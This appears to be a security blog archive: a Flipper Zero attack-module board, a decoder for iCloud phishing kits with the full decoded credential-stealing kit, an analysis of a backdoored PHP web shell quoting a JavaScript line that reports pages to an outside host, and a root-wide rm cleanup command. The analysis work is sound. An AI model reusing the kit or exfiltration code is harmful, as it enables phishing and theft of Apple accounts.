2024-08-13

3H34N Flipper Zero Board (Three in One – CC1101/NRF24L01/ESP32)


I'm thrilled to announce that the PCB for the Flipper Zero board has been successfully completed. This design integrates three modules into a single board.

As you can see, one side of the board houses two modules, while the other side holds one module. On the left, we have the NRF24L01; on the right, the CC1101; and on the back, the ESP32.

The NRF24L01 module is used for mouse jacking and operates on the Bluetooth frequency. Please note that when using Bluetooth, the NRF24L01 conflicts with the CC1101, so it’s necessary to remove the CC1101 from the board, using pin headers.

On the right, we have the CC1101 module, which helps increase the range of reception and transmission of sub-gigahertz radio signals. As you may know, the Flipper Zero already has an internal CC1101 module, but when you want to use sub-gigahertz, you should switch to the external module through the sub-gigahertz settings. You can also connect a custom antenna to extend the range.

On the back is the ESP32. Since the Flipper Zero doesn’t have an internal Wi-Fi chip, this module is essential for certain Wi-Fi attacks and is compatible with the [ESP32] Wi-Fi Marauder application on the Flipper Zero.

Additionally, we’ve included 3-position DIP switches to connect VCC power to each module as needed. This feature helps prevent conflicts and conserves battery life.

Requirements for Board:
NRF24L01+PA+LNA Module
CC1101 Module
ESP32-WROOM-32 - CP2102 Chip - 30pin Module

3 Way 2.54MM DIP switch
2x4 Pins header Female
2x4 Pins header Female
Female Header 2.54mm single row 15 Pin
Female Header 2.54mm single row 15 Pin

Strengths: Simple, affordable, portable module; three-in-one design.
Weaknesses: The NRF24L01 conflicts with the CC1101.

A special thanks to my friends Reza and Pouya for their participation and support throughout this journey.

CC1101/NRF24L01/ESP32 for Flipper Zero
Designed by 3H34N

2022-10-27

"iServer/Powered By iSender Team" decoder

When your iPhone is lost, some hackers set up a fake website that looks like Apple's and message you on WhatsApp or other social media, asking you to reset your password, so that they can unlock your iPhone and disable "Find My iPhone".

I checked and decoded some fake website scripts that steal iCloud data and are encoded with a custom PHP encoder called "iServer/Powered By iSender Team".

decoder:
<?php
/*
 * Script to decrypt files encoded with iServer/Powered By iSender Team
 */

// Send the result as plain text so a browser never renders the decoded kit
header('Content-Type: text/plain; charset=utf-8');

// Your encoded file path
$file = '/home/user/file.php';

/**
 * Return the part of $str after $needle, or $str unchanged if $needle is absent.
 */
function str_after($str, $needle, $last_occurence = false)
{
    $pos = $last_occurence ? strrpos($str, $needle) : strpos($str, $needle);

    if ($pos === false) return $str;

    return substr($str, $pos + strlen($needle));
}

// get file content
$content = file_get_contents($file);
if ($content === false) {
    exit("Cannot read $file\n");
}

// split the eval section
$eval_code = str_after($content, "eval(");
$eval_code1 = strstr($eval_code, ")))", true);
if ($eval_code1 === false) {
    exit("No eval(...))) section found\n");
}

// get the first value (the "from" alphabet passed to strtr)
$value1 = str_after($eval_code1, "','"); // gets all text from needle on
$value2 = strstr($value1, "',", true); // gets all text before needle

// get the second value (the "to" alphabet passed to strtr)
$value3 = str_after($value1, "','"); // gets all text from needle on
$value4 = strstr($value3, "'", true); // gets all text before needle
if ($value2 === false || $value4 === false) {
    exit("Could not extract the two alphabets\n");
}

// decode the file: the payload is the last line of the encoded file
$myfile = file(str_replace('\\', '/', $file));
$file_ap = array_pop($myfile);
echo base64_decode(strtr($file_ap, $value2, $value4));

put your encoded file here:
// Your encoded file path
$file = '/home/user/file.php';
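
The same static decoding as an added Python example (not code from the original post or from the kit's authors): it looks for what the decoder above looks for, two quoted strtr() alphabets between eval( and ))) with the payload on the last line, and never evaluates anything. The wrapper layout built by make_constructed_sample is an assumption made so the example runs on a harmless, constructed input; it is not a real iServer file.

```python
import base64
import re

STD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def extract_alphabets(source):
    """Return the (from, to) strtr() alphabets found between 'eval(' and ')))'."""
    start = source.find("eval(")
    end = source.find(")))", start)
    if start == -1 or end == -1:
        raise ValueError("no eval(...))) wrapper found")
    # Same anchors as the PHP decoder: skip the first quoted argument,
    # then take the next two quoted strings.
    match = re.search(r"','([^']*)','([^']*)'", source[start:end])
    if match is None:
        raise ValueError("wrapper does not carry two quoted alphabets")
    return match.group(1), match.group(2)


def decode_sample(source):
    """Statically decode the last line of the file; nothing is ever eval'd."""
    src, dst = extract_alphabets(source)
    size = min(len(src), len(dst))        # PHP strtr() ignores the longer tail
    table = str.maketrans(src[:size], dst[:size])
    payload = source.rstrip("\r\n").rsplit("\n", 1)[-1].translate(table)
    payload = re.sub(r"[^A-Za-z0-9+/]", "", payload)  # PHP skips other bytes
    payload += "=" * (-len(payload) % 4)              # restore the padding
    return base64.b64decode(payload)


def make_constructed_sample(plain):
    """Build a harmless test file in the assumed layout (not a real sample)."""
    custom = STD[13:] + STD[:13]                      # constructed alphabet
    body = base64.b64encode(plain).decode().translate(str.maketrans(STD, custom))
    return ("<?php /* constructed wrapper */ "
            f"eval(a(b(c('rb','{custom}','{STD}')))); ?>\n" + body + "\n")


if __name__ == "__main__":
    sample = make_constructed_sample(b"<?php echo 'constructed sample'; ?>")
    print(decode_sample(sample).decode())
```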

sample encoded file: 
iServer



decoded:
<?php
 $real_ip = real_ip(); $country_ip = ip_info($real_ip, "country"); $city = ip_info($real_ip, "city"); $url = htmlspecialchars($_SERVER["HTTP_REFERER"]); $uri = "#" . $url; $auth = end(explode("=", $url)); $lang = substr($_SERVER["HTTP_ACCEPT_LANGUAGE"], 0, 2); $IP = real_ip(); $browser = getbrowser(); $os = getos($_SERVER["HTTP_USER_AGENT"]); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://ip-api.com/json/" . $IP); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $ip_data_in = curl_exec($ch); curl_close($ch); $ip_data = json_decode($ip_data_in, true); $country = $ip_data["country"]; $city = $ip_data["city"]; $isp = $ip_data["org"]; $code = $ip_data["zip"]; $timezone = $ip_data["timezone"]; $headers.= 'From: iServer' . ""; $subjects = "True Login"; $subject = "False Login"; include "../authid.php"; if (!empty($_POST["appleID"]) && !empty($_POST["pw"])) { $pass = $_POST["pw"]; $pass = str_replace(array("&"), array("+"), $pass); $pass = str_replace(array("#"), array("%23"), $pass); $id = $_POST["appleID"]; include "fml.php"; if ($httpcode == 200 && stripos($myResult, "Invalid Apple ID/Password") == false && stripos($myResult, "Users Enter Correct Data.") == false && stripos($myResult, "This Apple ID is locked") == false) { $mess = "<p>✅ True Login ✅ 😃
		
📱 Link Code' => " . $ID . $auth. $imei. $ref."
-------------------------------------
🆔 Apple ID => " . $_POST['appleID'] . "
🔑 Password => " . $_POST['pw'] . "
-------------------------------------
💻 System Information 📱
-------------------------------------
🌎 IP Address => ".$IP."
📅 TimeStamp => ".date('d/m/Y H:i:s')."
🌐 Lang => " . $lang . "
🛫 Country => ".$country."
🏙 City => ".$city."
⌨️ Browser => ".$browser."
🖥 OS => ".$os."
📫 Postal Code => " . $code . "
🕛 Time Zone => " . $timezone . "
⚡ Connection => " . $isp . "
---------------------------------------
🆔 $twitter
🆔 $telegram
$copy"; $messBot = str_replace("</p>", "\n", $mess); $messBot = strip_tags($messBot); pronot("", $messBot); $remove = autoremove($_POST["appleID"], $_POST["pw"]); pronot("", "---------📴 Auto Remove Result---------\n$remove\n"); $file = fopen("../prolink/unlocked.txt","a"); fwrite($file, "<td>$id</td><td>$pass</td><td>$auth</td><td>$IP</td><td>$browser</td><td>$remove$myResult</td></tr>"); fwrite($file,"\r\n"); fclose($file); $file = fopen("../prolink/unlockedemail.txt","a"); fwrite($file, "<td>$id</td><td>$pass</td><td>$auth</td><td>$IP</td><td>$browser</td></tr>"); fwrite($file,"\r\n"); fclose($file); $file = fopen("../blacklist.txt","a"); fwrite($file, "$IP"); fwrite($file,"\r\n"); fclose($file); mail($to, $subjects, $messBot, $headers, $remove); echo "OK"; } else { if ($httpcode == 200 && stripos($myResult, "Invalid Apple ID/Password") == true && stripos($myResult, "This domain is not authorised to use SilentRemove API") == false && stripos($myResult, "This Apple ID is locked") == false) { $mess = "<p>❌️ False Login ❌️ 😧

📱 Link Code' => " . $ID . $auth. $imei."
-------------------------------------
🆔 Apple ID => " . $_POST['appleID'] . "
🔑 Password => " . $_POST['pw'] . "
-------------------------------------
💻 System Information 📱
-------------------------------------
🌎 IP Address => ".$IP."
📅 TimeStamp => ".date('d/m/Y H:i:s')."
🌐 Lang => " . $lang . "
🛫 Country => ".$country."
🏙 City => ".$city."
⌨️ Browser => ".$browser."
🖥 OS => ".$os."
📫 Postal Code => " . $code . "
🕛 Time Zone => " . $timezone . "
⚡ Connection => " . $isp . "
---------------------------------------
🆔 $twitter
🆔 $telegram
$copy"; $messBot = str_replace("</p>", "\n", $mess); $messBot = strip_tags($messBot); pronot("", $messBot); $file = fopen("../prolink/failed.txt","a"); fwrite($file, "<td>$id</td><td>$pass</td><td>$auth</td><td>$IP</td><td>$browser</td></tr>"); fwrite($file,"\r\n"); fclose($file); mail($to, $subject, $messBot, $headers); echo "INVALID"; } else { if ($httpcode == 200 && stripos($myResult, "Invalid Apple ID/Password") == false && stripos($myResult, "This domain is not authorised to use SilentRemove API") == false && stripos($myResult, "This Apple ID is locked") == true) { $mess = "<p>🔒 User entered locked Apple ID ❌️</p>"; $mess .= "<p></p>"; $mess .= "<p>🔗 Link Code : " . $auth. "</p>"; $mess .= "<p></p>"; $mess .= "<p>🆔 Apple ID : " . $_POST['appleID'] . "</p>"; $mess .= "<p>🔑 Password : " . $_POST["pw"] . "</p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>   ⌨ Owner System Info     </p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>📍 IP Address: " . $IP . "</p>"; $mess .= "<p>📱 Browser : " . $browser . "</p>"; $mess .= "<p>🖥 OS : " . $os . "</p>"; $mess .= "<p>🌐 Dev.Lang : " . $lang . "</p>"; $mess .= "<p>🌏 Country : " . $country . "</p>"; $mess .= "<p>🏙 City : " . $city . "</p>"; $mess .= "<p>📫 Postal Code : " . $code . "</p>"; $mess .= "<p>🕛 Time Zone : " . $timezone . "</p>"; $mess .= "<p>⚡ Connection : " . $isp . "</p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>   ☎️ Contact US     </p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>🆔 $twitter</p>"; $mess .= "<p>🆔 $telegram</p>"; $mess .= "<p>$copy</p>"; $messBot = str_replace("</p>", "\n", $mess); $messBot = strip_tags($messBot); pronot("", $messBot); echo "INVALID"; } } } } function AutoRemove($id, $pass) { $msg = file_get_contents("https://" . $_SERVER["SERVER_NAME"] . "/ickit/ilock.php?id=" . $id . "&pass=" . 
$pass); $msg = json_decode($msg); $owner_text = $msg->text; $owner_number = $msg->number; $Serial = $msg->newinfo; $myCheck["appleid"] = $id; $myCheck["password"] = $pass; $myCheck["key"] = "6DR-H5K-85D-ASA-FS7-3U8-YCC-MJB"; $myCheck["subscription"] = 1; $myCheck["format"] = "JSON"; $ch = curl_init("https://api.ifreeicloud.co.uk"); curl_setopt($ch, CURLOPT_POSTFIELDS, $myCheck); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $myResult = curl_exec($ch); $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($httpcode == 200 && stripos($myResult, "Invalid Apple ID/Password") == false && stripos($myResult, "This domain is not authorised to use SilentRemove API") == false && stripos($myResult, "This Apple ID is locked") == false) { $a = json_decode($myResult); $name = $a->name; $count = $a->count; if (0 < $count) { $text = "👤 Name: $name\n\n📱 Total Devices: $count\n\n🔠 Message: $owner_text\n🔢 Lost Mode Number: $owner_number\n\n"; $devices = $a->devices; foreach($devices as $device){ $aname = $device->name; $model = $device->model; $mode = $device->mode; $status = $device->status; $unlocked = $device->unlocked; if($unlocked){ $unlocked = 'Removed 📴 ✅'; } else { $unlocked = 'Unlock Failed 📶 ⛔'; } $text.= "Device Name: $aname\nDevice Model: $model\nDevice Mode: $mode\n$status+$unlocked\n\n"; } $Serials = "--★--Powered By iSender Team--★--\n\n" . $Serial . "\n\n"; return $text . 
$Serials; } else { return "This Apple ID no have devices."; } } else { return "INVALID"; } } function getOS($user_agent) { $os_platform = "Unknown OS Platform"; $os_array = array("/windows nt 10/i" => "Windows 10", "/windows nt 6.3/i" => "Windows 8.1", "/windows nt 6.2/i" => "Windows 8", "/windows nt 6.1/i" => "Windows 7", "/windows nt 6.0/i" => "Windows Vista", "/windows nt 5.2/i" => "Windows Server 2003/XP x64", "/windows nt 5.1/i" => "Windows XP", "/windows xp/i" => "Windows XP", "/windows nt 5.0/i" => "Windows 2000", "/windows me/i" => "Windows ME", "/win98/i" => "Windows 98", "/win95/i" => "Windows 95", "/win16/i" => "Windows 3.11", "/macintosh|mac os x/i" => "Mac OS X", "/mac_powerpc/i" => "Mac OS 9", "/linux/i" => "Linux", "/ubuntu/i" => "Ubuntu", "/iphone/i" => "iPhone", "/ipod/i" => "iPod", "/ipad/i" => "iPad", "/android/i" => "Android", "/blackberry/i" => "BlackBerry", "/webos/i" => "Mobile"); foreach ($os_array as $regex => $value) { if (preg_match($regex, $user_agent)) { $os_platform = $value; } } return $os_platform; } function getBrowser() { $agent = $_SERVER["HTTP_USER_AGENT"]; $name = "NA"; if (preg_match("/MSIE/i", $agent) && !preg_match("/Opera/i", $agent)) { $name = "Internet Explorer"; } else { if (preg_match("/Firefox/i", $agent)) { $name = "Mozilla Firefox"; } else { if (preg_match("/Chrome/i", $agent)) { $name = "Google Chrome"; } else { if (preg_match("/Safari/i", $agent)) { $name = "Apple Safari"; } else { if (preg_match("/Opera/i", $agent)) { $name = "Opera"; } else { if (preg_match("/Netscape/i", $agent)) { $name = "Netscape"; } } } } } } return $name; } function real_ip() { if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) { return $_SERVER["HTTP_X_FORWARDED_FOR"]; } if (isset($_SERVER["HTTP_X_REAL_IP"])) { return $_SERVER["HTTP_X_REAL_IP"]; } return $_SERVER["REMOTE_ADDR"]; } function ip_info($ip = NULL, $purpose = "location", $deep_detect = true) { $output = NULL; if (filter_var($ip, FILTER_VALIDATE_IP) === false) { $ip = 
$_SERVER["REMOTE_ADDR"]; if ($deep_detect) { if (filter_var($_SERVER["HTTP_X_FORWARDED_FOR"], FILTER_VALIDATE_IP)) { $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; } if (filter_var($_SERVER["HTTP_CLIENT_IP"], FILTER_VALIDATE_IP)) { $ip = $_SERVER["HTTP_CLIENT_IP"]; } } } $purpose = str_replace(array("name", "\n", "\t", " ", "-", "_"), NULL, strtolower(trim($purpose))); $support = array("country", "countrycode", "state", "region", "city", "location", "address"); $continents = array("AF" => "Africa", "AN" => "Antarctica", "AS" => "Asia", "EU" => "Europe", "OC" => "Australia (Oceania)", "NA" => "North America", "SA" => "South America"); if (filter_var($ip, FILTER_VALIDATE_IP) && in_array($purpose, $support)) { $ipdat = @json_decode(@file_get_contents("http://ip-api.com/json/" . $ip)); if (@strlen(@trim($ipdat->countryCode)) == 2) { switch ($purpose) { case "location": $output = array("city" => $ipdat->city, "state" => $ipdat->regionName, "country" => $ipdat->country, "country_code" => $ipdat->countryCode); break; case "address": $address = array($ipdat->countryName); if (1 <= @strlen($ipdat->regionName)) { $address[] = $ipdat->regionName; } if (1 <= @strlen($ipdat->city)) { $address[] = $ipdat->city; } $output = implode(", ", array_reverse($address)); break; case "city": $output = $ipdat->city; break; case "state": $output = $ipdat->regionName; break; case "region": $output = $ipdat->regionName; break; case "country": $output = $ipdat->country; break; case "countrycode": $output = $ipdat->countryCode; break; } } return $output; } return $output; } ?>

2020-08-18

How Hackers Become Victims: Backdoor in PHP web shells

I decided to decode a PHP web shell that was encoded with the Fopo online encoder. It is called "ATTACK SHELL PRiV9" or "K2ll33d Shell 2019" and belongs to "r00t.info".

PHP web shell:

Encoded source:

You might find what we encountered interesting!

As you can see, it contains a backdoor that copies itself as newsr.php into every directory of the website and sends the location and other information to the address "http://r00t.info/ccb.js" and to the e-mail address "byhero44@gmail.com", with the password "a4cd2905b660e8b1bc73a7c4571252da" (an MD5 hash).

ccb.js contains:

a=new/**/Image();a.src='http://www.expoilt.com/yaz.php?a='+escape(location.href);

I changed every "Http" to "Hxxp" to prevent execution and harm to your system, so if you want to run it you need to change the values back to the original.

Other names and addresses are:

Turkey Cyber Army team

https://expoilt.com/yaz.php?a=

http://r00t.info/txt/lamer.txt

k2ll33d

Indoxploit Shell

Sym Bypass 403 Shell

Berandal Indoxploit Shell V2.1

Premium Wso Shell

Whmcs Killer

Mobile Shell V.05 2018 Private

K2ll33d Shell

3turr ~ Sh311

Server V-8 Attack Shell

Bypass shell

Wordpress Mass Change Password 2019

Smevk_pathan Shell V3 Bypass Shell

Leaf Php Mailer V.2.7

Bloodsecurity Bypass Shell

Anon Priv9 Shell

Wso Shell

R00t.info Priv7 Shell New 2016

Wso Shell 4.2.2

G5 Private Bypass Shell

 

If you have used it, you need to know that your entire website is infected.

The solution to clean it:

Look for "newsr.php" files in every directory of your website and remove them.

If you are using Linux, use this command:

find / -name newsr.php -exec rm -rf {} \;

Also, if you have uploaded the file, delete it completely.

Also delete the CGI shell files that were created by the PHP web shell.
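
A non-destructive variant of the cleanup above, as an added example that is not part of the original post: it records the path, SHA-256 and modification time of every newsr.php before anything is removed, also flags .php/.js files containing the addresses quoted in this post, and moves findings to a quarantine directory instead of deleting them. The function names, the restriction to the web root and the quarantine directory are assumptions.

```python
import hashlib
import os
import shutil
import time

# Addresses quoted in the post above. Encoded copies will not contain them
# in clear text, so the file-name match stays the primary signal.
INDICATORS = (b"r00t.info/ccb.js", b"byhero44@gmail.com", b"expoilt.com/yaz.php")


def scan_webroot(webroot, dropped_name="newsr.php"):
    """Return one record per suspicious file under webroot, changing nothing."""
    findings = []
    for folder, _dirs, files in os.walk(webroot):
        for name in files:
            path = os.path.join(folder, name)
            if os.path.islink(path) or not name.lower().endswith((".php", ".js")):
                continue
            try:
                with open(path, "rb") as handle:
                    data = handle.read()
            except OSError:
                continue                      # unreadable: skip, do not abort
            hits = [i.decode() for i in INDICATORS if i in data]
            if name == dropped_name or hits:
                findings.append({
                    "path": path,
                    "sha256": hashlib.sha256(data).hexdigest(),
                    "mtime": time.strftime("%Y-%m-%dT%H:%M:%SZ",
                                           time.gmtime(os.path.getmtime(path))),
                    "name_match": name == dropped_name,
                    "indicators": hits,
                })
    return sorted(findings, key=lambda item: item["path"])


def quarantine(findings, webroot, quarantine_dir):
    """Move findings out of the web root, keeping relative paths as evidence."""
    moved = []
    for item in findings:
        target = os.path.join(quarantine_dir, os.path.relpath(item["path"], webroot))
        os.makedirs(os.path.dirname(target), exist_ok=True)
        shutil.move(item["path"], target)
        moved.append(target)
    return moved
```

Keep the quarantine directory outside the web root so the moved files can no longer be requested over HTTP; the recorded modification times help date the original upload.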

You can find the full source code at https://pastebin.com/bmrrDeAb



2020-06-07

OWASP JoomScan Project in Pentestmag

Our article was published in Pentestmag.




OWASP JoomScan Project
by Mohammad Reza Espargham, Ali Razmjoo, and Ehsan Nezami
JoomScan is not aiming just at testing different vulnerabilities and trying to simulate attacks, the process always begins with information gathering and it proceeds step by step following ethical hacking techniques. The information-gathering phase is not limited to the web application but also the webserver and domain, also misconfigurations, human-errors, and different possible risks on the product.

https://lnkd.in/dcwRNvD
Other contributors: Valerio Alessandroni, Marlene Ladendorff, PhD, Dr. Chuck Easttom, Daniel Benicio F Alves, LPIC, SUSE SCA, FORTINET NSE3, Kavya Pearlman ⚠️ Safety First ⚠️, Alex Halfin, Vinícius Vieira, Mostafa Mahmoud, Mohammad Reza Espargham, Ali Razmjoo, Ehsan Nezami, Ofer Tirosh, and Franciny S.